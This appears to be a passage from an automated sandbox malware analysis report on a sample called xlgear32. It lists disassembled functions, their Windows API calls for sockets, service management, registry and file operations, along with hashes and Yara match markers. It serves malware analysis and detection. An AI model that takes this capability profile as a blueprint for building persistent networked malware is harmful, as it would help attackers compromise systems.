                                                                          • API ID: ErrorLast$Recvselect
                                                                          • String ID: 3'
                                                                          • API String ID: 886190287-280543908
                                                                          • Opcode ID: 4b91a659ce8b681acfa07e5998fb3c7f600134c37f5432455a39f42c1948286f
                                                                          • Instruction ID: 20e844c12755c53465285fc06ddadd6f20162cd0be3e28701a919cecda080c5b
                                                                          • Opcode Fuzzy Hash: 4b91a659ce8b681acfa07e5998fb3c7f600134c37f5432455a39f42c1948286f
                                                                          • Instruction Fuzzy Hash: 17411AB1A15305AFDB109F64C91876BBBE9AF84359F104D1EF89987380EB74DD40CBA2
                                                                          Function 02D929EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 586 2d929ee-2d92a06 587 2d92a0c-2d92a10 586->587 588 2d92ab3-2d92abb call 2da0b10 586->588 589 2d92a39-2d92a4c WSASetLastError closesocket call 2d9a509 587->589 590 2d92a12-2d92a15 587->590 596 2d92abe-2d92ac6 588->596 595 2d92a51-2d92a55 589->595 590->589 594 2d92a17-2d92a36 call 2da0b10 call 2d92f50 590->594 594->589 595->588 598 2d92a57-2d92a5f call 2da0b10 595->598 604 2d92a69-2d92a71 call 2da0b10 598->604 605 2d92a61-2d92a67 598->605 610 2d92aaf-2d92ab1 604->610 611 2d92a73-2d92a79 604->611 605->604 606 2d92a7b-2d92aad ioctlsocket WSASetLastError closesocket call 2d9a509 605->606 606->610 610->588 610->596 611->606 611->610
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92A3B
                                                                          • closesocket.WS2_32 ref: 02D92A42
                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D92A89
                                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D92A97
                                                                          • closesocket.WS2_32 ref: 02D92A9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                          • String ID:
                                                                          • API String ID: 1561005644-0
                                                                          • Opcode ID: ad9b6e1c3a12ca5d42de8d044c3961fd1f0c925f5d3b45d7cee91f7dd6b85a35
                                                                          • Instruction ID: ac6da7658ae289d902e52ddfe746ccbaa12ce5b6588996d12255753aa3052825
                                                                          • Opcode Fuzzy Hash: ad9b6e1c3a12ca5d42de8d044c3961fd1f0c925f5d3b45d7cee91f7dd6b85a35
                                                                          • Instruction Fuzzy Hash: 7E217F72A04205EBEF219BB89958B6AB7E9EB84315F14496AF845D3380EB708D40CB61
                                                                          Function 02D91BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 613 2d91ba7-2d91bcf call 2db53f0 RtlEnterCriticalSection 616 2d91be9-2d91bf7 RtlLeaveCriticalSection call 2d9e330 613->616 617 2d91bd1 613->617 620 2d91bfa-2d91c20 RtlEnterCriticalSection 616->620 618 2d91bd4-2d91be0 call 2d91b79 617->618 623 2d91be2-2d91be7 618->623 624 2d91c55-2d91c6e RtlLeaveCriticalSection 618->624 622 2d91c34-2d91c36 620->622 625 2d91c38-2d91c43 622->625 626 2d91c22-2d91c2f call 2d91b79 622->626 623->616 623->618 628 2d91c45-2d91c4b 625->628 626->628 631 2d91c31 626->631 628->624 630 2d91c4d-2d91c51 628->630 630->624 631->622
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D91BAC
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02D91BBC
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02D91BEA
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02D91C13
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02D91C56
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                                          • String ID:
                                                                          • API String ID: 1633115879-0
                                                                          • Opcode ID: cde70a22bae742c8ded65f5cc3a2a2e7d8ad2ece000f6d169480afd23e30c95d
                                                                          • Instruction ID: e9054f8008d135a26ca0ed710b51c4b57fc17191820aeec143c0b5326c6d4426
                                                                          • Opcode Fuzzy Hash: cde70a22bae742c8ded65f5cc3a2a2e7d8ad2ece000f6d169480afd23e30c95d
                                                                          • Instruction Fuzzy Hash: C5217675A00206EBDB15CF68C484B9ABBB5FF88314F20858AE84A97301D770ED01CBA0
                                                                          Function 00403310 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 00403336
                                                                            • Part of subcall function 00404454: HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                            • Part of subcall function 00404454: HeapDestroy.KERNEL32 ref: 004044A4
                                                                          • GetCommandLineA.KERNEL32 ref: 00403384
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 004033AF
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004033D2
                                                                            • Part of subcall function 0040342B: ExitProcess.KERNEL32 ref: 00403448
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                          • String ID:
                                                                          • API String ID: 2057626494-0
                                                                          • Opcode ID: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                          • Instruction ID: a936b3102d24e78b19d7c169988c3063d29dd1dd2c17feae02d4b7387c8d63d1
                                                                          • Opcode Fuzzy Hash: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                          • Instruction Fuzzy Hash: 172183B1900615AED704AFB5DE45A6E7F68EF44705F10413EF901B72D2DB385900CB58
                                                                          Function 02D92EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92EEE
                                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D92EFD
                                                                          • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D92F0C
                                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D92F36
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Socketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 2093263913-0
                                                                          • Opcode ID: ed0cdc83ae0881ca0814b8b344b8223bdfd2a3e32355995f6ea5a9a388e65a61
                                                                          • Instruction ID: 9bf25ffa5526116613886b478db67ab82ddb8a2af34561bf0b6c5d969902ffd9
                                                                          • Opcode Fuzzy Hash: ed0cdc83ae0881ca0814b8b344b8223bdfd2a3e32355995f6ea5a9a388e65a61
                                                                          • Instruction Fuzzy Hash: 78012572A51204FBDB215F66DC58F5ABBA9EB89762F008965F9189B381D7708D00CBB0
                                                                          Function 02D92DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 02D92D39: WSASetLastError.WS2_32(00000000), ref: 02D92D47
                                                                            • Part of subcall function 02D92D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D92D5C
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92E6D
                                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D92E83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Sendselect
                                                                          • String ID: 3'
                                                                          • API String ID: 2958345159-280543908
                                                                          • Opcode ID: 1564f3cb82117ca9923c231a4d7f794b1588c0efe37372f9f8b0d307e1046443
                                                                          • Instruction ID: 46c3ca782ffbd6c03f4e4dd58ce56dbc17f5824c96c504d215f46f0a4fa63393
                                                                          • Opcode Fuzzy Hash: 1564f3cb82117ca9923c231a4d7f794b1588c0efe37372f9f8b0d307e1046443
                                                                          • Instruction Fuzzy Hash: 14317EB1E11209ABDF109FA8C858BEE7BAAEF44358F00455AEC0497380E7B59D54CBE0
                                                                          Function 02D92AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92AEA
                                                                          • connect.WS2_32(?,?,?), ref: 02D92AF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastconnect
                                                                          • String ID: 3'
                                                                          • API String ID: 374722065-280543908
                                                                          • Opcode ID: d73c3e5f4bc95cba493e0fc6a957fa510538f3566c0757c7d29be00bea5547b6
                                                                          • Instruction ID: c1f484406babeb0ecc3f348720fc8623ae6e0eb98337f8bcbe6caee9806b096a
                                                                          • Opcode Fuzzy Hash: d73c3e5f4bc95cba493e0fc6a957fa510538f3566c0757c7d29be00bea5547b6
                                                                          • Instruction Fuzzy Hash: 92219871E10104ABDF14AFA4C518BADB7FADF44329F104599ED1893384EB748D018FA1
                                                                          Function 02D9353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 50fbcfd287cf34ccff8d434c2fae82fff00721794e4387d6a905f207f3528dda
                                                                          • Instruction ID: ef84d0100637bd98e0b51e4d7be141f1b6df3a8f4e5c90027c43e8719570ce37
                                                                          • Opcode Fuzzy Hash: 50fbcfd287cf34ccff8d434c2fae82fff00721794e4387d6a905f207f3528dda
                                                                          • Instruction Fuzzy Hash: F95108B190524ADFCF45DF68D554AAABBA1EF08320F10819AF8699B380D774DD11CFA1
                                                                          Function 02D9369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02D936A7
                                                                            • Part of subcall function 02D92420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D92432
                                                                            • Part of subcall function 02D92420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D92445
                                                                            • Part of subcall function 02D92420: RtlEnterCriticalSection.NTDLL(?), ref: 02D92454
                                                                            • Part of subcall function 02D92420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D92469
                                                                            • Part of subcall function 02D92420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D92470
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1601054111-0
                                                                          • Opcode ID: d573a4629d340eab99a54c0f30da7730b5602fb168cca82297dbc83d4d1057b1
                                                                          • Instruction ID: 26f8727f2f8e79e5c4488555cfa9995d523b54d56019dc4ab80bb4a0fc0bc2f1
                                                                          • Opcode Fuzzy Hash: d573a4629d340eab99a54c0f30da7730b5602fb168cca82297dbc83d4d1057b1
                                                                          • Instruction Fuzzy Hash: C511C1B6100209EBDF219E14DC85FAA3B6AEF44354F104456FE528A390C735DC60CBA4
                                                                          Function 0040D239 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEventValue
                                                                          • String ID:
                                                                          • API String ID: 3274066644-0
                                                                          • Opcode ID: 848ff14df3f2a634d379990b4fea930b8d779d49c9f6026ffbc23f3a2a8876a4
                                                                          • Instruction ID: 43f7f1bdc0e0de907177f6b6c59249bbdee9f16920e95659578899f9ec16038b
                                                                          • Opcode Fuzzy Hash: 848ff14df3f2a634d379990b4fea930b8d779d49c9f6026ffbc23f3a2a8876a4
                                                                          • Instruction Fuzzy Hash: 7D01D436C046819BC7055B78BF52AD6BBB2AA267307048279D9D2732B3D674880AD70D
                                                                          Function 02DA20F0 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __beginthreadex.LIBCMT ref: 02DA2106
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D9A989,00000000), ref: 02DA2137
                                                                          • ResumeThread.KERNEL32(?,?,?,?,?,00000002,02D9A989,00000000), ref: 02DA2145
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 1685284544-0
                                                                          • Opcode ID: 1caba139bacf31fc3e3b5e4f4d7feaf2ba2da18f1a740653e7ca483f57361bdf
                                                                          • Instruction ID: e1646b97adb49ba62bc6ab2469618261d5aebd4fd9d8d2397ad95d347d4255c1
                                                                          • Opcode Fuzzy Hash: 1caba139bacf31fc3e3b5e4f4d7feaf2ba2da18f1a740653e7ca483f57361bdf
                                                                          • Instruction Fuzzy Hash: 34F0C271240200ABE7209F59DC94F95B3E9EF88324F24096AFA58C7380C771EC92CB90
                                                                          Function 02D91AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(02DC72B4), ref: 02D91ABA
                                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 02D91ACB
                                                                          • InterlockedExchange.KERNEL32(02DC72B8,00000000), ref: 02D91AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                                          • String ID:
                                                                          • API String ID: 1856147945-0
                                                                          • Opcode ID: 90e2d31000afdc9c6dc782c760a094a5e834fea7cce165c702dd0d17c0e5d36f
                                                                          • Instruction ID: 83435cee26979110ea2506ed9b111d45f86963fea725dc0db52caf5f21d36e3b
                                                                          • Opcode Fuzzy Hash: 90e2d31000afdc9c6dc782c760a094a5e834fea7cce165c702dd0d17c0e5d36f
                                                                          • Instruction Fuzzy Hash: E6D05E32984215DFF22166A4AC1EB78F72CE745611F600756FC6AC13C4EA505D2489B6
                                                                          Function 00402998 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: LocalTime
                                                                          • String ID: /chk
                                                                          • API String ID: 481472006-3837807730
                                                                          • Opcode ID: f3a3eadc1d0c9a1a0394f1396bd1503ca77f71c6efbd0f1cd009767f1b99a43c
                                                                          • Instruction ID: cb0b5a5a7b7c7f0cbc1e9a26bf25cd872e3b9fcabbc26e344e1b4aa862cf7f22
                                                                          • Opcode Fuzzy Hash: f3a3eadc1d0c9a1a0394f1396bd1503ca77f71c6efbd0f1cd009767f1b99a43c
                                                                          • Instruction Fuzzy Hash: 4411E131E092918AD3009B74AF22BE67BB0A741720F04417AE9D2F60E3D3384949DB4D
                                                                          Function 00402BA9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 004027C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: ManagerOpen
                                                                          • String ID: \
                                                                          • API String ID: 1889721586-2967466578
                                                                          • Opcode ID: 2bfe48fefd9440e013fe4eef41469be407ac41d103b5cc7a3f1eeb799745b00b
                                                                          • Instruction ID: 7f1600a063a2e5460e31b11f98fe4f49db49c3c5fb27d8c1ae44caa3520fc949
                                                                          • Opcode Fuzzy Hash: 2bfe48fefd9440e013fe4eef41469be407ac41d103b5cc7a3f1eeb799745b00b
                                                                          • Instruction Fuzzy Hash: 50019CB1C086028ADB0C8B78FFB53BA7AE18704321F14007F8583A21E2C2BC4908DB1D
                                                                          Function 02D94BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D94BF2
                                                                            • Part of subcall function 02D91BA7: __EH_prolog.LIBCMT ref: 02D91BAC
                                                                            • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91BBC
                                                                            • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91BEA
                                                                            • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91C13
                                                                            • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91C56
                                                                            • Part of subcall function 02D9E0F8: __EH_prolog.LIBCMT ref: 02D9E0FD
                                                                            • Part of subcall function 02D9E0F8: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D9E17C
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02D94CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1927618982-0
                                                                          • Opcode ID: d997eeff372ece0a145610144abd7cf9c052f22bbb57743eaf6f3151edfe596e
                                                                          • Instruction ID: 9ce73d10c0b2b4b67fe72276e2f6fecd9ca35c8296c99dc4935adc25efd554e1
                                                                          • Opcode Fuzzy Hash: d997eeff372ece0a145610144abd7cf9c052f22bbb57743eaf6f3151edfe596e
                                                                          • Instruction Fuzzy Hash: A451E375D04248EFDF15DFA8C884AEEBBB5EF09314F14815AE805AB352DB709A45CF60
                                                                          Function 004026D6 Relevance: 3.1, APIs: 2, Instructions: 74registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNEL32(80000002), ref: 0040DA35
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 0fc60fb11a91657524907a6390a633eaf13ae38cf2d5f0ea4cf2ddacf7384a51
                                                                          • Instruction ID: 959ffc0a15fdc0a25c22f6c24cae5b2d074bdbebd34e44a768e94947d5a8f4d2
                                                                          • Opcode Fuzzy Hash: 0fc60fb11a91657524907a6390a633eaf13ae38cf2d5f0ea4cf2ddacf7384a51
                                                                          • Instruction Fuzzy Hash: 46214975C082519ACB059B74AE557F97BB0AB25330F1441BAC9D2B31E3C234890ADB0D
                                                                          Function 02D92D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92D47
                                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D92D5C
                                                                            • Part of subcall function 02D9A509: WSAGetLastError.WS2_32(00000000,?,?,02D92A51), ref: 02D9A517
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Send
                                                                          • String ID:
                                                                          • API String ID: 1282938840-0
                                                                          • Opcode ID: 43cb128e8c1a323060578659adb6942b6234d98188d5cac3369dc9d7304a1471
                                                                          • Instruction ID: 855cc7144929685a7fccefb4c441272b87045af26eabbbbe56e878d47c89df42
                                                                          • Opcode Fuzzy Hash: 43cb128e8c1a323060578659adb6942b6234d98188d5cac3369dc9d7304a1471
                                                                          • Instruction Fuzzy Hash: 230175B5501209FFDB205F98895496BBBEDEB45365B10492EF85983340EB709D00CBA1
                                                                          Function 00402694 Relevance: 3.0, APIs: 2, Instructions: 41fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CopyFileA.KERNEL32 ref: 00402753
                                                                          • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 004027C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFileManagerOpen
                                                                          • String ID:
                                                                          • API String ID: 3059512871-0
                                                                          • Opcode ID: 8e1845cf7f92dca85c2c7619cc39d234705e43e0658ed4339084d981f9725aa2
                                                                          • Instruction ID: 009893bf2d519130fc0a2a9731e02dd1f0b91ef27533f4e4924aa85a8848ddc0
                                                                          • Opcode Fuzzy Hash: 8e1845cf7f92dca85c2c7619cc39d234705e43e0658ed4339084d981f9725aa2
                                                                          • Instruction Fuzzy Hash: 04F07DB19045128BDB0D8734FFB97B67AE5C704371B04007D9583E21F2C6B84808DB2C
                                                                          Function 02D983EA Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D98407
                                                                          • shutdown.WS2_32(?,00000002), ref: 02D98410
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastshutdown
                                                                          • String ID:
                                                                          • API String ID: 1920494066-0
                                                                          • Opcode ID: 4ebcb3f93ca717b9a04cab0f6e739682d6f20c098ebfaf66e1a2ca646266cc69
                                                                          • Instruction ID: 57155c1fe2d72041ed9504722f87e113f1d0407dda500f38b93a1af4d2657b7f
                                                                          • Opcode Fuzzy Hash: 4ebcb3f93ca717b9a04cab0f6e739682d6f20c098ebfaf66e1a2ca646266cc69
                                                                          • Instruction Fuzzy Hash: 29F09072A44314CFDB109F54D520B5AB7E6FF0A721F01881DF99997380D770AC00CBA1
                                                                          Function 00404454 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                            • Part of subcall function 0040430C: GetVersionExA.KERNEL32 ref: 0040432B
                                                                          • HeapDestroy.KERNEL32 ref: 004044A4
                                                                            • Part of subcall function 0040482B: HeapAlloc.KERNEL32(00000000,00000140,0040448D,000003F8), ref: 00404838
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                          • String ID:
                                                                          • API String ID: 2507506473-0
                                                                          • Opcode ID: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                          • Instruction ID: 6792b556898a49359456169ba0c82f011abfeecbff717d74d0c7f117a7ac5838
                                                                          • Opcode Fuzzy Hash: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                          • Instruction Fuzzy Hash: 90F065F0A01302DAEB206B70AE4572A3695DBC0755F20483BFA04F51E0EA788884A91D
                                                                          Function 02DCFE33 Relevance: 1.7, APIs: 1, Instructions: 200fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 0995771757ca8982a654db045f2c3ae21ad12fa5f11763c182b0380433d8b45c
                                                                          • Instruction ID: 43002a762936cf1f6c7d63df3bb08050035719cca8984ed0d36bf37c093276e0
                                                                          • Opcode Fuzzy Hash: 0995771757ca8982a654db045f2c3ae21ad12fa5f11763c182b0380433d8b45c
                                                                          • Instruction Fuzzy Hash: C251E7F3A08618AFE7156E09EC807BEF7E9EFD4320F16853DE6C587700EA3158058696
                                                                          Function 02D95119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9511E
                                                                            • Part of subcall function 02D93D7E: htons.WS2_32(?), ref: 02D93DA2
                                                                            • Part of subcall function 02D93D7E: htonl.WS2_32(00000000), ref: 02D93DB9
